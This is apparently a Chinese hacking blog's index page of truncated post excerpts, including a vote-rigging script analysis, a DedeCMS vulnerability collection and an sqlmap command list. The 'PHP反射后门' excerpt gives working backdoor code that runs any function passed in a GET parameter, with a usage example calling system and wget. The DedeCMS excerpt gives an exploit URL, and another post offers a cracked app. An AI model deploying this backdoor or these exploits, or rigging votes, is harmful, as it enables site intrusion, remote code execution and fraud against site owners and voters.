某投票系统刷票分析[python]

某投票系统刷票分析[python]
转载法克,作者:haxsscker 总结分析:编写脚本 既然如此,思路就要变了 撸主得出的刷票方法如下: 修改(伪造)IP--------->获取返回头中的Set-Cookie--->使用这个cookie打开投票网页---->抓取生成的投票地址---->打开投票地址完成投票 于是,下面的PYTHON脚本就出现了(其中地址用team.f4ck.net代替,do_HTTP_request是撸主自己写的请求package,就是完成了一...

dedecms漏洞整理 织梦cms漏洞集锦

dedecms漏洞整理 织梦cms漏洞集锦
首先说一下找后台路径的技巧。如下: 首先看看补丁,地址:  /data/admin/ver.txt  这是看程序补丁打到了几号的。 错误日志 地址:/data\mysql_error_trace.inc   这个可是会爆路径的呦。。注意喽。 如果找不到剩下的就考验你的社工能力了。 /plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=a...

sqlmap使用命令大全中文版

sqlmap使用命令大全中文版
因为经常能用到SQLMAP注入,所以就收集了此篇文章呦。 常见参数: -u #注入点 -f #指纹判别数据库类型 -b #获取数据库版本信息 -p #指定可测试的参数(?page=1&id=2 -p “page,id”) -D “” #指定数据库名 -T “” #指定表名 -C “” #指定字段 Options(选项): --version #显示程序的版本号并退出 -h, --help #显示此帮助消息并退出 -v VERBOSE #详细级别:0-6(默认为1): 0...

安卓数据恢复工具[破解版]

安卓数据恢复工具[破解版]
我们知道电脑数据丢失可以使用FinaData等数据恢复软件进行恢复数据,但是安卓手机数据丢失缺毫无对策,这款安卓数据恢复软件解决您的困扰! 提示:此软件是否有病毒等等,博主并未测试,只是收藏备用!!! 一、软件介绍: 安卓手机数据恢复软件随着智能机 的普及,越来越多的用户需要的都是安卓(android)系统,那么在你的android手机上误删除,格式化SD卡,或者因操作不...

各个搜索引擎爬虫的User-Agent

各个搜索引擎爬虫的User-Agent
因为能用到所以网上收集的。 baidu:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) Google:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Sogou:Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07) Yahoo:Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.c...

PHP反射后门

PHP反射后门
PHP反射后门 1 2 3 4 <?php $func = new ReflectionFunction($_GET[m]); echo $func->invokeArgs(array($_GET[c])); ?><?php $func = new ReflectionFunction($_GET[m]); echo $func->invokeArgs(array($_GET[c])); ?> 这个可以应用在linux系统中。应用举例: news.php?m=system&c=wget ht...

微信公众号文章采集源码PHP

微信公众号文章采集源码PHP
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 <html xmlns="http://www.w3.org/1999/xhtml"> <head>   <m...

SEO高手?或者百度内部搞鬼?

SEO高手?或者百度内部搞鬼?
今天和往常一样打开百度新闻,但是可能今天有些留心吧,以前打开百度新闻都是直接进“互联网”或者“科技”这两个栏目,偶尔还会看看社会新闻、国际新闻,娱乐新闻真的是非常非常的少看。但是今天可能手残,在拉到百度页面下面看到了这样的一幕,一个小图片吸引了我,可能是穿着太暴露了吧。呵呵。 百度新闻 当我点进去那个图片链接的时候,第一眼的感觉就是这个程序号熟悉,因...

php逻辑或 详解

php逻辑或 详解
今天修复公司网站一个错误,是二次开发遗留下的。主要代码如下: 1 2 3 $xianzaitime = time(); //这里主要是获得当前的时间 $next_visit_dateline = strtotime($next_visit_dateline); 这里是把收集到用户提交的时间转换为Unix时间戳 if($xianzaitime>=$next_visit_dateline || ceil(($next_visit_dateline - $xianzaitime)/8640...

讲诉在各个LG G2论坛混了半天的成就

讲诉在各个LG G2论坛混了半天的成就
以前用的手机是阿里云OS的,名字叫“基伍大”对于这款国产手机,我表示“呵呵”,就因为这款手机我接触的刷机,不过话说回来,正经有一段时间没有接触刷机,ROOT,REC等等了,这不最近蛋疼,就像把自己的国行LG G2给ROOT,然后刷一下机,换个系统玩玩,所以连着2天泡论坛,从一个小小白,变成了小白,说一下自己的心得吧。因为你是国行的所以,记住:ROOT后就没有保修了,除非你...